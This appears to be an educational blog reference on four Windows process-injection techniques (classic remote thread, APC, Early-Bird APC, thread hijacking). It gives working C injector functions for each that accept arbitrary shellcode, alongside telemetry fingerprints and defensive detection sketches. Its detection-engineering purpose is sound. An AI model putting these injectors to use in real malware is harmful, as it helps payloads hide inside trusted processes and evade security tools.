A technical reference covering the most common process injection techniques used in Windows malware — VirtualAllocEx/WriteProcessMemory, APC injection, early-bird injection, and thread hijacking. Includes C code, EDR evasion context, and detection points for each technique.

Note: This post is educational. Understanding how injection works is fundamental to detection engineering, malware analysis, and defensive product development.

Overview

Process injection is the mechanism by which code in one process executes in the context of another. Malware uses this to:

  1. Execute from a trusted process (evading application whitelisting)
  2. Access another process’s memory or handles
  3. Hide from simple process enumeration

The Windows API provides numerous primitives that can be combined to achieve injection. We’ll walk through the most prevalent techniques with working C code, then look at what each looks like to a defender.


Technique 1: Classic VirtualAllocEx / WriteProcessMemory

The textbook technique. Widely detected, but still used in commodity malware because it works.

How It Works

  1. Open a handle to the target process with PROCESS_ALL_ACCESS
  2. Allocate RWX memory in the target with VirtualAllocEx
  3. Copy shellcode in with WriteProcessMemory
  4. Create a remote thread at the shellcode address with CreateRemoteThread

Code

#include <windows.h>
#include <stdio.h>

// Placeholder shellcode — replace with real payload
// This is just a NOP sled + INT3 for demonstration
unsigned char shellcode[] = {
    0x90, 0x90, 0x90, 0x90,  // NOP sled
    0xCC                      // INT3 (breakpoint)
};
SIZE_T shellcode_len = sizeof(shellcode);

BOOL inject_classic(DWORD pid) {
    HANDLE hProcess = NULL;
    HANDLE hThread  = NULL;
    LPVOID remote_mem = NULL;
    BOOL   result   = FALSE;

    // Step 1: Open the target process
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) {
        fprintf(stderr, "[-] OpenProcess failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 2: Allocate RWX memory in target
    remote_mem = VirtualAllocEx(
        hProcess,
        NULL,
        shellcode_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!remote_mem) {
        fprintf(stderr, "[-] VirtualAllocEx failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 3: Write shellcode
    SIZE_T bytes_written = 0;
    if (!WriteProcessMemory(hProcess, remote_mem, shellcode, shellcode_len, &bytes_written)) {
        fprintf(stderr, "[-] WriteProcessMemory failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 4: Create remote thread
    hThread = CreateRemoteThread(hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);
    if (!hThread) {
        fprintf(stderr, "[-] CreateRemoteThread failed: %lu\n", GetLastError());
        goto cleanup;
    }

    WaitForSingleObject(hThread, INFINITE);
    result = TRUE;
    printf("[+] Injection complete\n");

cleanup:
    if (hThread)  CloseHandle(hThread);
    if (hProcess) CloseHandle(hProcess);
    return result;
}

Detection Fingerprint

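API Call              Event / Telemetry
OpenProcess           Sysmon Event ID 10 (ProcessAccess)
VirtualAllocEx        ETW: Microsoft-Windows-Threat-Intelligence (remote allocation)
WriteProcessMemory    ETW: Microsoft-Windows-Threat-Intelligence (remote write)
CreateRemoteThread    Sysmon Event ID 8 (CreateRemoteThread)

Sysmon has no dedicated event for the allocation or the write. The Threat-Intelligence provider can only be consumed by protected anti-malware processes, so in practice that telemetry comes from an EDR rather than from Sysmon.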

The RWX allocation is the loudest signal. Legitimate software rarely allocates PAGE_EXECUTE_READWRITE memory in another process, so many EDRs alert on it directly.
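From the defender's side, the RWX check can be sketched as a small predicate over a normalized allocation event. This is a minimal sketch, not any product's logic: the `alloc_event` struct and its field names are hypothetical, and the two protection values are copied from the Windows SDK so the code compiles without windows.h.

```c
#include <stdbool.h>
#include <stdint.h>

/* Page protection values as defined in the Windows SDK (winnt.h),
   redefined here so the sketch builds on any platform. */
#define WIN_PAGE_EXECUTE_READWRITE 0x40u
#define WIN_PAGE_EXECUTE_WRITECOPY 0x80u

/* Hypothetical normalized allocation event; field names are illustrative. */
typedef struct {
    uint32_t source_pid;  /* process that requested the allocation */
    uint32_t target_pid;  /* process that received the allocation  */
    uint32_t protection;  /* requested page protection flags       */
} alloc_event;

/* True when one process allocates writable and executable memory in another. */
bool is_remote_wx_alloc(const alloc_event *ev) {
    bool cross_process = ev->source_pid != ev->target_pid;
    bool writable_exec =
        (ev->protection &
         (WIN_PAGE_EXECUTE_READWRITE | WIN_PAGE_EXECUTE_WRITECOPY)) != 0;
    return cross_process && writable_exec;
}
```

On its own this predicate will also fire on some debuggers and instrumentation tools, so it is better treated as one input to a chain than as a verdict.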


Technique 2: APC Injection

Asynchronous Procedure Calls (APCs) are a Windows mechanism for executing functions in the context of a specific thread. Every thread has an APC queue; user-mode APCs queued to it run when the thread enters an alertable wait state.

How It Works

  1. Open the target process and enumerate its threads
  2. Allocate memory in the target and write the shellcode, as in Technique 1
  3. Queue an APC to each thread with QueueUserAPC
  4. The APC fires when any thread calls SleepEx, WaitForSingleObjectEx, etc. with bAlertable = TRUE

Code

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>   // malloc, realloc, free

// Find all threads belonging to a process
DWORD* get_thread_ids(DWORD pid, DWORD* count) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot == INVALID_HANDLE_VALUE) return NULL;

    THREADENTRY32 te = { .dwSize = sizeof(THREADENTRY32) };
    DWORD capacity = 64;
    DWORD* tids = (DWORD*)malloc(capacity * sizeof(DWORD));
    *count = 0;

    if (Thread32First(snapshot, &te)) {
        do {
            if (te.th32OwnerProcessID == pid) {
                if (*count >= capacity) {
                    capacity *= 2;
                    tids = (DWORD*)realloc(tids, capacity * sizeof(DWORD));
                }
                tids[(*count)++] = te.th32ThreadID;
            }
        } while (Thread32Next(snapshot, &te));
    }

    CloseHandle(snapshot);
    return tids;
}


BOOL inject_apc(DWORD pid, unsigned char* shellcode, SIZE_T len) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) return FALSE;

    // Allocate and write shellcode (same as classic technique)
    LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote_mem) { CloseHandle(hProcess); return FALSE; }

    SIZE_T written;
    WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);

    // Queue APC to all threads
    DWORD thread_count = 0;
    DWORD* tids = get_thread_ids(pid, &thread_count);

    for (DWORD i = 0; i < thread_count; i++) {
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, tids[i]);
        if (hThread) {
            QueueUserAPC((PAPCFUNC)remote_mem, hThread, 0);
            CloseHandle(hThread);
        }
    }

    free(tids);
    CloseHandle(hProcess);

    printf("[+] APC queued to %lu threads in PID %lu\n", thread_count, pid);
    return TRUE;
}

Reliability Problem

APC injection only executes when a thread enters an alertable wait. Many processes never do this on their main threads. The workaround is targeting processes known to use alertable waits (svchost.exe running certain services, explorer.exe, etc.) or using Early-Bird injection below.

Detection Fingerprint

QueueUserAPC is less commonly monitored than CreateRemoteThread. Some EDRs check the APC target address against known-good regions. The kernel’s Microsoft-Windows-Threat-Intelligence ETW provider emits events for remote APC queue operations, but only protected anti-malware processes can subscribe to it, so this telemetry usually reaches a SIEM only if an EDR forwards it.
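The "known-good regions" check can be sketched as a range lookup against the target's loaded modules. This is a minimal sketch under stated assumptions: the `module_range` type and the function name are hypothetical, and the module list is assumed to come from image-load telemetry (for example Sysmon Event ID 7) or from walking the target's module list.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical record of one loaded module's address range. */
typedef struct {
    uint64_t base;  /* first byte of the mapped image     */
    uint64_t size;  /* size of the mapped image, in bytes */
} module_range;

/* True when addr falls inside any [base, base + size) range. */
bool addr_in_known_module(uint64_t addr, const module_range *mods, size_t count) {
    for (size_t i = 0; i < count; i++) {
        /* Written as a subtraction so base + size cannot overflow. */
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size) {
            return true;
        }
    }
    return false;
}
```

An APC routine, thread start address, or new instruction pointer for which this returns false points into memory not backed by a loaded image. The same lookup serves all three cases.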


Technique 3: Early-Bird APC Injection

Early-Bird solves the alertable wait problem by creating a suspended process, queuing the APC before it runs any code, then resuming it. The first thing the main thread does on resume is process its APC queue.

BOOL inject_earlybird(const char* target_path, unsigned char* shellcode, SIZE_T len) {
    STARTUPINFOA        si = { .cb = sizeof(si) };
    PROCESS_INFORMATION pi = {0};

    // Create target process in suspended state
    if (!CreateProcessA(
            target_path, NULL, NULL, NULL,
            FALSE,
            CREATE_SUSPENDED,        // <-- key flag
            NULL, NULL, &si, &pi)) {
        fprintf(stderr, "[-] CreateProcess failed: %lu\n", GetLastError());
        return FALSE;
    }

    printf("[*] Created suspended PID: %lu, TID: %lu\n", pi.dwProcessId, pi.dwThreadId);

    // Allocate and write shellcode
    LPVOID remote_mem = VirtualAllocEx(pi.hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote_mem) {
        TerminateProcess(pi.hProcess, 1);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        return FALSE;
    }

    SIZE_T written;
    WriteProcessMemory(pi.hProcess, remote_mem, shellcode, len, &written);

    // Queue APC to the main thread (it's still suspended)
    QueueUserAPC((PAPCFUNC)remote_mem, pi.hThread, 0);

    // Resume: the pending APC is delivered during ntdll thread initialization,
    // before the image entry point runs
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    printf("[+] Early-bird injection complete\n");
    return TRUE;
}

Early-Bird is reliable precisely because the APC is delivered during thread initialization, before the target’s entry point runs. It’s also quieter than CreateRemoteThread, though it does create a new (potentially anomalous) process.
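For detection, the defining trait of Early-Bird is ordering: a cross-process write and an APC both land on a child whose main thread has never been resumed. A minimal sketch of tracking that state per child process follows. The `child_state` struct, its fields, and the handler names are hypothetical, and the events feeding them are assumed to come from whatever sensor is available.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical per-child tracking state; field names are illustrative. */
typedef struct {
    uint32_t child_pid;
    uint32_t main_tid;
    bool     created_suspended;  /* CREATE_SUSPENDED was set at creation     */
    bool     resumed;            /* main thread has been resumed at least once */
    bool     remote_write_seen;  /* cross-process write arrived before resume */
} child_state;

/* Record a cross-process write only while the child is still suspended. */
void on_remote_write(child_state *c) {
    if (c->created_suspended && !c->resumed) {
        c->remote_write_seen = true;
    }
}

/* Record that the main thread has started running. */
void on_resume(child_state *c) {
    c->resumed = true;
}

/* True when an APC targets the main thread of a never-resumed child
   that has already received a cross-process write. */
bool is_earlybird_apc(const child_state *c, uint32_t apc_target_tid) {
    return c->created_suspended && !c->resumed &&
           c->remote_write_seen && apc_target_tid == c->main_tid;
}
```

Requiring the write before the APC keeps the rule from firing on software that merely starts children suspended, which some launchers and debuggers do.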


Technique 4: Thread Hijacking (SetThreadContext)

Hijack an existing thread by suspending it, overwriting its instruction pointer, and resuming.

BOOL inject_thread_hijack(DWORD pid, unsigned char* shellcode, SIZE_T len) {
    // Find a suitable thread (not the main thread ideally)
    DWORD thread_count = 0;
    DWORD* tids = get_thread_ids(pid, &thread_count);
    if (!tids || thread_count == 0) { free(tids); return FALSE; }  // free(NULL) is a no-op

    DWORD  target_tid = tids[0];
    free(tids);

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    HANDLE hThread  = OpenThread(THREAD_ALL_ACCESS, FALSE, target_tid);
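    if (!hProcess || !hThread) {
        // Close whichever handle did open so it is not leaked
        if (hThread)  CloseHandle(hThread);
        if (hProcess) CloseHandle(hProcess);
        return FALSE;
    }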

    // Suspend the thread
    SuspendThread(hThread);

    // Get current context
    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(hThread, &ctx);

    // Allocate shellcode in target process
    LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    SIZE_T written;
    WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);

    // Redirect instruction pointer to shellcode
#ifdef _WIN64
    ctx.Rip = (DWORD64)remote_mem;
#else
    ctx.Eip = (DWORD)remote_mem;
#endif

    SetThreadContext(hThread, &ctx);

    // Resume thread — it will execute our shellcode
    ResumeThread(hThread);

    CloseHandle(hThread);
    CloseHandle(hProcess);

    printf("[+] Thread %lu hijacked in PID %lu\n", target_tid, pid);
    return TRUE;
}

Limitations

Thread hijacking is disruptive to the target process: the code above never restores the saved context, so the hijacked thread’s legitimate work does not complete. If the thread was in the middle of a database query or network request, the process may crash or hang. The SuspendThread, GetThreadContext, SetThreadContext sequence against a thread in another process is also a well-known pattern that many EDRs monitor.


Comparison Summary

Technique                Reliability    Noise Level    Primary Detection
Classic VirtualAllocEx   High           High           Sysmon EID 8, RWX alloc
APC Injection            Medium         Medium         QueueUserAPC on remote thread
Early-Bird APC           High           Medium         New process + QueueUserAPC
Thread Hijacking         Medium-High    High           SuspendThread + SetThreadContext

Detection Perspective

If you’re building detections, the key behavioral indicators are:

  1. Cross-process memory allocation: VirtualAllocEx from a process that isn’t the target
  2. Cross-process write: WriteProcessMemory following a remote allocation
  3. Remote thread creation: CreateRemoteThread where the start address is in a heap allocation (not a known module)
  4. APC to remote thread: QueueUserAPC where the APC function address is in remote-allocated memory
  5. Suspended process + APC: CREATE_SUSPENDED process creation followed quickly by a remote write and QueueUserAPC to the main thread
  6. Context modification: SetThreadContext changing RIP/EIP to an address outside any loaded module

A single event is rarely sufficient. What matters is a chain of these events, in order, between the same pair of processes within a short time window. Process activity graphs (BloodHound-style, but for process behavior) are a good fit for catching these patterns.
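The chain idea can be sketched as an ordered match over a time-sorted event list. This is a minimal sketch rather than a production correlator: the `event_kind` values, the `proc_event` struct, and `chain_matches` are all hypothetical names, and the events are assumed to be already normalized and sorted by timestamp.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical event kinds; names are illustrative, not a real schema. */
typedef enum {
    EV_REMOTE_ALLOC,
    EV_REMOTE_WRITE,
    EV_REMOTE_THREAD,
    EV_REMOTE_APC,
    EV_SET_CONTEXT
} event_kind;

typedef struct {
    uint64_t   time_ms;     /* timestamp in milliseconds */
    uint32_t   source_pid;  /* process performing the action */
    uint32_t   target_pid;  /* process acted upon */
    event_kind kind;
} proc_event;

/* True when `chain` occurs in order (not necessarily adjacent) for one
   source/target pair, with the last step no later than window_ms after
   the first. `events` must be sorted by time_ms. */
bool chain_matches(const proc_event *events, size_t n,
                   const event_kind *chain, size_t chain_len,
                   uint32_t source_pid, uint32_t target_pid,
                   uint64_t window_ms) {
    if (chain_len == 0) return false;
    for (size_t start = 0; start < n; start++) {
        const proc_event *first = &events[start];
        if (first->kind != chain[0] || first->source_pid != source_pid ||
            first->target_pid != target_pid) {
            continue;
        }
        size_t matched = 1;
        for (size_t i = start + 1; i < n && matched < chain_len; i++) {
            const proc_event *ev = &events[i];
            if (ev->time_ms - first->time_ms > window_ms) break;
            if (ev->source_pid == source_pid &&
                ev->target_pid == target_pid &&
                ev->kind == chain[matched]) {
                matched++;
            }
        }
        if (matched == chain_len) return true;
    }
    return false;
}
```

The classic technique corresponds to the chain EV_REMOTE_ALLOC, EV_REMOTE_WRITE, EV_REMOTE_THREAD. Swapping the last step for EV_REMOTE_APC or EV_SET_CONTEXT covers the APC and thread-hijacking variants with the same matcher.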


Further Reading

The Windows Internals series (Yosifovich, Solomon, et al.) covers APC mechanics in detail. For detection engineering, the Elastic Detection Rules repository is a good reference for how these techniques translate to detection logic.